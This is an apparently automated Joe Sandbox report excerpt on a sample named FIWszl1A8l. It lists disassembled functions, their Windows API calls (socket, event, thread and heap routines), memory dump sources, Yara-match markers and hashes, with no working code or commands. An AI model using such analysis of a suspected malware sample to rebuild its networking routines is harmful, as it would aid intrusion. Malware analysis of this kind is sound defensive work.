                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strcat_s$_memset$__localtime64__time64__wcsnicmp_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 3592133475-0
                                                                                                  • Opcode ID: 9612d8c1e5366324d8b9188000d87f817137c3975bf1db378519ae119bbab18c
                                                                                                  • Instruction ID: e5d59ba111de203788649fd9247d55e6837fc385e2bb812d9f69244302431678
                                                                                                  • Opcode Fuzzy Hash: 9612d8c1e5366324d8b9188000d87f817137c3975bf1db378519ae119bbab18c
                                                                                                  • Instruction Fuzzy Hash: 7DF1A4F5900714ABD724DB64CC85FEBB3B8EF88700F408569E70AA7281EB71AA45CF55
                                                                                                  Function 028356BF Relevance: 13.7, APIs: 9, Instructions: 205COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_strlen$____lc_codepage_func__getenv_helper_nolock__invoke_watson__malloc_crt_strcpy_s
                                                                                                  • String ID:
                                                                                                  • API String ID: 2056778627-0
                                                                                                  • Opcode ID: fb94a165544a799f799d92d1cfaadda03cf0e03ff00a903cef25901c42debaeb
                                                                                                  • Instruction ID: 805996d9ff2f16cd21a42441561744c97fbd46774e0f8a3114a668feb67a55c1
                                                                                                  • Opcode Fuzzy Hash: fb94a165544a799f799d92d1cfaadda03cf0e03ff00a903cef25901c42debaeb
                                                                                                  • Instruction Fuzzy Hash: 7061D87DC01259AFEB27EF68CCC19AE77FAEF49314B644029E504EB160E73899418F91
                                                                                                  Function 03FB9FBB Relevance: 13.7, APIs: 9, Instructions: 205COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_strlen$____lc_codepage_func__getenv_helper_nolock__invoke_watson__malloc_crt_strcpy_s
                                                                                                  • String ID:
                                                                                                  • API String ID: 2056778627-0
                                                                                                  • Opcode ID: fb94a165544a799f799d92d1cfaadda03cf0e03ff00a903cef25901c42debaeb
                                                                                                  • Instruction ID: 961060546ea7c9bc715d3d39281963bf904a476d4bf0ed35a625328c70c16a54
                                                                                                  • Opcode Fuzzy Hash: fb94a165544a799f799d92d1cfaadda03cf0e03ff00a903cef25901c42debaeb
                                                                                                  • Instruction Fuzzy Hash: 4361A3F2D05356AFEF15EF66CC818EEB7B9EB45310B28406AE540EF160E73598418F20
                                                                                                  Function 02D09730 Relevance: 13.7, APIs: 9, Instructions: 195timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,7A8163DF,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E,00000000), ref: 02D09773
                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(02D0E1AE,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D09812
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D09850
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D09875
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D0989A
                                                                                                    • Part of subcall function 02D01280: __CxxThrowException@8.LIBCMT ref: 02D01290
                                                                                                    • Part of subcall function 02D01280: DeleteCriticalSection.KERNEL32(00000000,02D0D3E6,02D26624,?,?,02D0D3E6,?,?,?,?,02D25A40,00000000), ref: 02D012A1
                                                                                                    • Part of subcall function 02D0CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(02D0E076,00000000,7A8163DF,02D0E04E,76F92F60,00000000,?,02D0E226,02D2110B,000000FF,?,02D0994A,02D0E226), ref: 02D0CE67
                                                                                                    • Part of subcall function 02D0CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(02D0E08E,00000000,?,02D0E226,02D2110B,000000FF,?,02D0994A,02D0E226,?,?,?,00000000,02D2125B,000000FF), ref: 02D0CE83
                                                                                                  • InterlockedExchange.KERNEL32(02D0E066,00000000), ref: 02D099A0
                                                                                                  • timeGetTime.WINMM(?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D099A6
                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D099B4
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D099BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1400036169-0
                                                                                                  • Opcode ID: a54763b38956bbd1a86b77770a69aeeb1627d6dc916fda42f7d9f06f1182c8d4
                                                                                                  • Instruction ID: c8cad6006d6cee5462a817f4df3862f5e34ca1e8d4238b8a2e1e090d6e9222f9
                                                                                                  • Opcode Fuzzy Hash: a54763b38956bbd1a86b77770a69aeeb1627d6dc916fda42f7d9f06f1182c8d4
                                                                                                  • Instruction Fuzzy Hash: 8881D6B0A01A46BFD354DF7A89C479AFBA8FB08304F50862EE12C97740D775A964CF90
                                                                                                  Function 02D03500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D03660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02D03667
                                                                                                    • Part of subcall function 02D03660: _free.LIBCMT ref: 02D0369C
                                                                                                    • Part of subcall function 02D03660: _malloc.LIBCMT ref: 02D036D7
                                                                                                    • Part of subcall function 02D03660: _memset.LIBCMT ref: 02D036E5
                                                                                                  • InterlockedIncrement.KERNEL32(02D31F0C), ref: 02D03565
                                                                                                  • InterlockedIncrement.KERNEL32(02D31F0C), ref: 02D03573
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 02D0359A
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 02D035B3
                                                                                                  • ResetEvent.KERNEL32(?,?,?,02D31F0C), ref: 02D035EE
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 02D03621
                                                                                                  • GetLastError.KERNEL32 ref: 02D03639
                                                                                                    • Part of subcall function 02D03F60: GetCurrentThreadId.KERNEL32 ref: 02D03F65
                                                                                                    • Part of subcall function 02D03F60: send.WS2_32(?,02D249C0,00000010,00000000), ref: 02D03FC6
                                                                                                    • Part of subcall function 02D03F60: SetEvent.KERNEL32(?), ref: 02D03FE9
                                                                                                    • Part of subcall function 02D03F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02D03FF5
                                                                                                    • Part of subcall function 02D03F60: WSACloseEvent.WS2_32(?), ref: 02D04003
                                                                                                    • Part of subcall function 02D03F60: shutdown.WS2_32(?,00000001), ref: 02D0401B
                                                                                                    • Part of subcall function 02D03F60: closesocket.WS2_32(?), ref: 02D04025
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 02D03649
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 127459856-0
                                                                                                  • Opcode ID: 197041681b85303b92153bda70f58ef54def5a077744186c9bd6499473d79fac
                                                                                                  • Instruction ID: 1687e1784ada1f1f8301d213e0b8fabd2944844b98797376fae2ac834215b9c1
                                                                                                  • Opcode Fuzzy Hash: 197041681b85303b92153bda70f58ef54def5a077744186c9bd6499473d79fac
                                                                                                  • Instruction Fuzzy Hash: 68418EB16407049FD3A0DF69DC85B6AB7E4FB48711F50486EEA46D3790D7B1E8048B50
                                                                                                  Function 00973500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00973660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00973667
                                                                                                    • Part of subcall function 00973660: _free.LIBCMT ref: 0097369C
                                                                                                    • Part of subcall function 00973660: _malloc.LIBCMT ref: 009736D7
                                                                                                    • Part of subcall function 00973660: _memset.LIBCMT ref: 009736E5
                                                                                                  • InterlockedIncrement.KERNEL32(0098D990), ref: 00973565
                                                                                                  • InterlockedIncrement.KERNEL32(0098D990), ref: 00973573
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0097359A
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 009735B3
                                                                                                  • ResetEvent.KERNEL32(?,?,?,0098D990), ref: 009735EE
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00973621
                                                                                                  • GetLastError.KERNEL32 ref: 00973639
                                                                                                    • Part of subcall function 00973F60: GetCurrentThreadId.KERNEL32 ref: 00973F65
                                                                                                    • Part of subcall function 00973F60: send.WS2_32(?,00987440,00000010,00000000), ref: 00973FC6
                                                                                                    • Part of subcall function 00973F60: SetEvent.KERNEL32(?), ref: 00973FE9
                                                                                                    • Part of subcall function 00973F60: InterlockedExchange.KERNEL32(?,00000000), ref: 00973FF5
                                                                                                    • Part of subcall function 00973F60: WSACloseEvent.WS2_32(?), ref: 00974003
                                                                                                    • Part of subcall function 00973F60: shutdown.WS2_32(?,00000001), ref: 0097401B
                                                                                                    • Part of subcall function 00973F60: closesocket.WS2_32(?), ref: 00974025
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00973649
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 127459856-0
                                                                                                  • Opcode ID: e0d7c3e981270277acad66a1495f617e27647d05f76902b02c52a6b101a985a6
                                                                                                  • Instruction ID: 29295673adf16032e235de15c78e1b44f1a856b4b145858cd0d8da2b6c458c01
                                                                                                  • Opcode Fuzzy Hash: e0d7c3e981270277acad66a1495f617e27647d05f76902b02c52a6b101a985a6
                                                                                                  • Instruction Fuzzy Hash: E641A4B2604704AFD360EF69DC81B5AB7E8FB88700F50842EF64AD7780D7B5E9049B51
                                                                                                  Function 02D04430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ResetEvent.KERNEL32(?), ref: 02D04443
                                                                                                  • ResetEvent.KERNEL32(?), ref: 02D0444C
                                                                                                  • timeGetTime.WINMM ref: 02D0444E
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02D0445D
                                                                                                  • WaitForSingleObject.KERNEL32(?,00001770), ref: 02D044AB
                                                                                                  • ResetEvent.KERNEL32(?), ref: 02D044C8
                                                                                                    • Part of subcall function 02D03F60: GetCurrentThreadId.KERNEL32 ref: 02D03F65
                                                                                                    • Part of subcall function 02D03F60: send.WS2_32(?,02D249C0,00000010,00000000), ref: 02D03FC6
                                                                                                    • Part of subcall function 02D03F60: SetEvent.KERNEL32(?), ref: 02D03FE9
                                                                                                    • Part of subcall function 02D03F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02D03FF5
                                                                                                    • Part of subcall function 02D03F60: WSACloseEvent.WS2_32(?), ref: 02D04003
                                                                                                    • Part of subcall function 02D03F60: shutdown.WS2_32(?,00000001), ref: 02D0401B
                                                                                                    • Part of subcall function 02D03F60: closesocket.WS2_32(?), ref: 02D04025
                                                                                                  • ResetEvent.KERNEL32(?), ref: 02D044DC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                  • String ID:
                                                                                                  • API String ID: 542259498-0
                                                                                                  • Opcode ID: 3bddb8f51be9d4765995deaf9294577770afd50b0de5a61c16adedf0f065cdeb
                                                                                                  • Instruction ID: 3afba703f727b9264329803ed621f4c9fbae40e55eb80b31e19e787de9a6361f
                                                                                                  • Opcode Fuzzy Hash: 3bddb8f51be9d4765995deaf9294577770afd50b0de5a61c16adedf0f065cdeb
                                                                                                  • Instruction Fuzzy Hash: 0B214F766407046BC330EB69DC88F97B3E8EF99710F104A1EF68AC7790D671E8148BA0
                                                                                                  Function 00974430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ResetEvent.KERNEL32(?), ref: 00974443
                                                                                                  • ResetEvent.KERNEL32(?), ref: 0097444C
                                                                                                  • timeGetTime.WINMM ref: 0097444E
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0097445D
                                                                                                  • WaitForSingleObject.KERNEL32(?,00001770), ref: 009744AB
                                                                                                  • ResetEvent.KERNEL32(?), ref: 009744C8
                                                                                                    • Part of subcall function 00973F60: GetCurrentThreadId.KERNEL32 ref: 00973F65
                                                                                                    • Part of subcall function 00973F60: send.WS2_32(?,00987440,00000010,00000000), ref: 00973FC6
                                                                                                    • Part of subcall function 00973F60: SetEvent.KERNEL32(?), ref: 00973FE9
                                                                                                    • Part of subcall function 00973F60: InterlockedExchange.KERNEL32(?,00000000), ref: 00973FF5
                                                                                                    • Part of subcall function 00973F60: WSACloseEvent.WS2_32(?), ref: 00974003
                                                                                                    • Part of subcall function 00973F60: shutdown.WS2_32(?,00000001), ref: 0097401B
                                                                                                    • Part of subcall function 00973F60: closesocket.WS2_32(?), ref: 00974025
                                                                                                  • ResetEvent.KERNEL32(?), ref: 009744DC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                  • String ID:
                                                                                                  • API String ID: 542259498-0
                                                                                                  • Opcode ID: c2920721286019c30cea39f657c44ba1db92b0625bcd1e7e263872539399072d
                                                                                                  • Instruction ID: 29ddb0552e88844fa1182d9db831dfdee810ab9da1033e446a8ee99c7b5c63a8
                                                                                                  • Opcode Fuzzy Hash: c2920721286019c30cea39f657c44ba1db92b0625bcd1e7e263872539399072d
                                                                                                  • Instruction Fuzzy Hash: A0218D76614B04ABC630EF79EC85B97B3E8FF89710F104A1EF58EC7250D671A8049BA1
                                                                                                  Function 02D04E80 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000139F,?), ref: 02D04E99
                                                                                                  • TryEnterCriticalSection.KERNEL32(?,?), ref: 02D04EB8
                                                                                                  • TryEnterCriticalSection.KERNEL32(?), ref: 02D04EC2
                                                                                                  • SetLastError.KERNEL32(0000139F), ref: 02D04ED9
                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 02D04EE2
                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 02D04EE9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 4082018349-0
                                                                                                  • Opcode ID: 010915a580e305948dcb9d668baaf3da55f02a62f5b2bbc56e75dd5b43b5eeec
                                                                                                  • Instruction ID: 8cc82cb0359103dc40fe95e782dce091358f609e624432ed6176212368492f5d
                                                                                                  • Opcode Fuzzy Hash: 010915a580e305948dcb9d668baaf3da55f02a62f5b2bbc56e75dd5b43b5eeec
                                                                                                  • Instruction Fuzzy Hash: 121163326043048BD330EA69EC88A6BB7E8EF58325B00092EFA55C3690DA71ED14C6A5
                                                                                                  Function 00974E60 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000139F,?), ref: 00974E79
                                                                                                  • TryEnterCriticalSection.KERNEL32(?,?), ref: 00974E98
                                                                                                  • TryEnterCriticalSection.KERNEL32(?), ref: 00974EA2
                                                                                                  • SetLastError.KERNEL32(0000139F), ref: 00974EB9
                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00974EC2
                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00974EC9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 4082018349-0
                                                                                                  • Opcode ID: f66bd2e2bddfd49811552c3af46a927edf0315d36b8eba95cbe3bb13c6750c08
                                                                                                  • Instruction ID: 37eade8e265418cd52d45207278730e4e6871349be14f1e90f3aadfa78aac080
                                                                                                  • Opcode Fuzzy Hash: f66bd2e2bddfd49811552c3af46a927edf0315d36b8eba95cbe3bb13c6750c08
                                                                                                  • Instruction Fuzzy Hash: 101160336147048BC320EF79AC85A6BB3ECFF88721B404A2AE609C6651DB61D804C7A5
                                                                                                  Function 02D0DD10 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000007F), ref: 02D0DD32
                                                                                                  • SetLastError.KERNEL32(0000007F), ref: 02D0DE35
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast
                                                                                                  • String ID: Main
                                                                                                  • API String ID: 1452528299-521822810
                                                                                                  • Opcode ID: 78449a350d230b83027ff442ef3032615b06031102b27c43f2f9be1bd9b21021
                                                                                                  • Instruction ID: a3b9b58bbd22a4d1dac6eebedf142081fcd615de104cacd9e5e21e3ebad453fb
                                                                                                  • Opcode Fuzzy Hash: 78449a350d230b83027ff442ef3032615b06031102b27c43f2f9be1bd9b21021
                                                                                                  • Instruction Fuzzy Hash: 5741E231A403059FE720DF98D8C0B6AB3E6FF64314F0445AAE8458B7A1E771ED45CB90
                                                                                                  Function 02D03F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D03F65
                                                                                                  • SetLastError.KERNEL32(0000139F,?,76F8DFA0,02D03648), ref: 02D04054
                                                                                                    • Part of subcall function 02D02BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D02BD6
                                                                                                    • Part of subcall function 02D02BC0: SwitchToThread.KERNEL32 ref: 02D02BEA
                                                                                                  • send.WS2_32(?,02D249C0,00000010,00000000), ref: 02D03FC6
                                                                                                  • SetEvent.KERNEL32(?), ref: 02D03FE9
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02D03FF5
                                                                                                  • WSACloseEvent.WS2_32(?), ref: 02D04003
                                                                                                  • shutdown.WS2_32(?,00000001), ref: 02D0401B
                                                                                                  • closesocket.WS2_32(?), ref: 02D04025
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 3254528666-0
                                                                                                  • Opcode ID: 68b6ccf07495d735ef62d0cfd2cb988c900348870cb6779beeab8f50f4101102
                                                                                                  • Instruction ID: 2a845df58b2d69ca6b343b88d7dd8d199c0569e1b9eaef72e7872d4a81cb4508
                                                                                                  • Opcode Fuzzy Hash: 68b6ccf07495d735ef62d0cfd2cb988c900348870cb6779beeab8f50f4101102
                                                                                                  • Instruction Fuzzy Hash: 3A2144706407009BD3309B28D88CB5BB7B9BB94714F104E0CFA8296BE0C7B6E849CB50
                                                                                                  Function 00973F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00973F65
                                                                                                  • SetLastError.KERNEL32(0000139F,?,76F8DFA0,00973648), ref: 00974054
                                                                                                    • Part of subcall function 00972B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00972B96
                                                                                                    • Part of subcall function 00972B80: SwitchToThread.KERNEL32 ref: 00972BAA
                                                                                                  • send.WS2_32(?,00987440,00000010,00000000), ref: 00973FC6
                                                                                                  • SetEvent.KERNEL32(?), ref: 00973FE9
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 00973FF5
                                                                                                  • WSACloseEvent.WS2_32(?), ref: 00974003
                                                                                                  • shutdown.WS2_32(?,00000001), ref: 0097401B
                                                                                                  • closesocket.WS2_32(?), ref: 00974025
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 3254528666-0
                                                                                                  • Opcode ID: 96ddbd3c41ff4dd121916df3f772ee3965a605c63939e8a8e5f01271d0108a41
                                                                                                  • Instruction ID: 273a6098549205ac62a508bfd3fd6f97c72dc5a844e40d6793e38066b5f74a51
                                                                                                  • Opcode Fuzzy Hash: 96ddbd3c41ff4dd121916df3f772ee3965a605c63939e8a8e5f01271d0108a41
                                                                                                  • Instruction Fuzzy Hash: 36212A72214B009BE3309F79D888B5BB7F9BB84714F14891CF28A9B791C7B5E845DB90
                                                                                                  Function 02D04060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D04074
                                                                                                  • ResetEvent.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D04087
                                                                                                  • ResetEvent.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D04090
                                                                                                  • ResetEvent.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D04099
                                                                                                    • Part of subcall function 02D01350: HeapFree.KERNEL32(?,00000000,?,?,?,02D040A6,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D01390
                                                                                                    • Part of subcall function 02D01420: HeapFree.KERNEL32(?,00000000,?,?,?,02D040B1,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D0143D
                                                                                                    • Part of subcall function 02D01420: _free.LIBCMT ref: 02D01459
                                                                                                  • HeapDestroy.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D040B9
